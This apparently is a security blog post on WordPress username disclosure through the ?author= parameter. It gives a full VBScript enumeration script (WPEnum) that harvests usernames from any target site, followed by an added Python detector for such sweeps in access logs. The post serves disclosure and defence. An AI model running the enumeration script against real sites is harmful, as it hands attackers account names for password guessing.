WordPress UserId & Username Enumeration Exploit/PoC Script

On 26th May 2011, a vulnerability in WordPress was disclosed that is relatively easy both to detect and to exploit. WordPress discloses usernames in response to a simple URL parameter, through the resulting page redirect and HTTP status code. Although showing the username in the page title is an intended WordPress feature, it can be abused easily by repeatedly requesting the main page with author=number to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though plenty of scripts, exploits and PoCs abusing this are already popping up all over the Internet, this post shows how easily the enumeration can be automated using Ajax/XMLHTTP from VBScript.

'Author: [email protected]
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by
'querying the value of the parameter 'author' using xmlHTTP.

Dim url, sQuery, args, i, max, xmlHTTP, k, j, username

If WScript.Arguments.Count < 1 Then
    WScript.Echo "WPEnum – WordPress User Enumeration Script"
    WScript.Echo "Author: [email protected]"
    WScript.Echo "Insufficient Parameters."
    WScript.Echo
    WScript.Echo "cscript WPEnum.vbs <url> [<max>]"
    WScript.Echo "<url>: A WordPress based website in the form of http://site/"
    WScript.Echo "<max>: [Optional] Maximum number of users. Default 20."
    WScript.Echo "Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10"
    WScript.Echo
    WScript.Quit
End If

Set args = WScript.Arguments

WScript.Echo "WPEnum – WordPress User Enumeration Script"
WScript.Echo "Author: [email protected]"
WScript.Echo
WScript.Echo "Enumerating ..."
WScript.Echo

i = 0
max = 20
url = args(0)
'Make sure the site URL ends with a slash before the query string is appended.
If Right(url, 1) <> "/" Then
    url = url & "/"
End If

If WScript.Arguments.Count = 2 And IsNumeric(args(1)) Then
    max = CInt(args(1))
End If

Set xmlHTTP = Nothing
Set xmlHTTP = CreateObject("Microsoft.XmlHttp")

For i = 1 To max
    'Use the normalised url, not the raw argument, so the query is well formed.
    sQuery = url & "?author=" & i
    xmlHTTP.open "GET", sQuery, False   'synchronous request
    xmlHTTP.send ""

    WScript.Sleep 70

    'With a synchronous request send() only returns once readyState is 4,
    'so this loop is merely a safety net.
    Do While Not xmlHTTP.readyState = 4
    Loop

    'WordPress answers 404 for an author id that does not exist, so the
    'first 404 marks the end of the user list.
    If xmlHTTP.status = 404 Then
        WScript.Echo
        i = i - 1
        WScript.Echo i & " users enumerated."
        WScript.Echo "Done!"
        Set xmlHTTP = Nothing
        WScript.Quit
    End If

    WScript.Echo "Userid:" & i

    'The username is shown in the page <title>; cut it out of the response.
    k = InStr(LCase(xmlHTTP.responseText), "<title>")
    j = InStr(LCase(xmlHTTP.responseText), "</title>")
    username = Mid(xmlHTTP.responseText, k + 7, j - k - 7)
    WScript.Echo username
    WScript.Echo
Next

'After a completed For loop i equals max + 1, so report max rather than i.
WScript.Echo max & " users enumerated."
WScript.Echo "Done!"

Set xmlHTTP = Nothing

'End of program
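As an added example, and not part of the original post or of the WPEnum script, here is the defender's side of the same behaviour: a small Python routine that spots an author-id sweep in a web server's access log. It looks for a client that requests several distinct ?author= values within a short window, and also reports which of those ids got a 3xx redirect (the sign that the id resolved to a real user and its name was exposed). The log lines, IP addresses, timestamps and user-agent strings are constructed for the example; the Apache combined log format is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access-log lines in Apache combined format (not taken from
# any real server). 203.0.113.5 walks ?author=1..4 and stops at the first 404,
# the pattern an enumeration script produces; 198.51.100.7 is ordinary browsing.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2011:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.5 - - [26/May/2011:10:00:01 +0000] "GET /author/admin/ HTTP/1.1" 200 5120 "-" "WPEnum"
203.0.113.5 - - [26/May/2011:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.5 - - [26/May/2011:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.5 - - [26/May/2011:10:00:03 +0000] "GET /?author=4 HTTP/1.1" 404 1234 "-" "WPEnum"
198.51.100.7 - - [26/May/2011:10:05:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.7 - - [26/May/2011:11:30:00 +0000] "GET /?p=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'path': m['path'],
        'status': int(m['status']),
    }


def find_author_sweeps(log_text, min_ids=3, window_seconds=60):
    """Flag clients that requested at least min_ids distinct ?author= ids within
    window_seconds. Returns {ip: {'ids': [...], 'redirected': [...]}} where
    'redirected' lists the ids that received a 3xx, i.e. resolved to a user."""
    hits = defaultdict(list)  # ip -> [(timestamp, author_id, status)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        am = AUTHOR_RE.search(rec['path'])
        if am:
            hits[rec['ip']].append((rec['ts'], int(am.group(1)), rec['status']))

    sweeps = {}
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({e[1] for e in events[start:end + 1]}) >= min_ids:
                sweeps[ip] = {
                    'ids': sorted({e[1] for e in events}),
                    'redirected': sorted({e[1] for e in events if 300 <= e[2] < 400}),
                }
                break
    return sweeps


if __name__ == '__main__':
    for ip, info in find_author_sweeps(SAMPLE_LOG).items():
        print(f"{ip}: probed author ids {info['ids']}, "
              f"ids that resolved to a user: {info['redirected']}")
```

The telltale shape is a run of 301 responses to ?author=1, 2, 3 ... ending in a 404, all from one client within seconds; a single ?author= request, as from 198.51.100.7 above, is normal traffic and is not flagged at the default threshold. Tune min_ids and window_seconds to the site, and change AUTHOR_RE to apply the same sliding-window check to any other sequential-id probe.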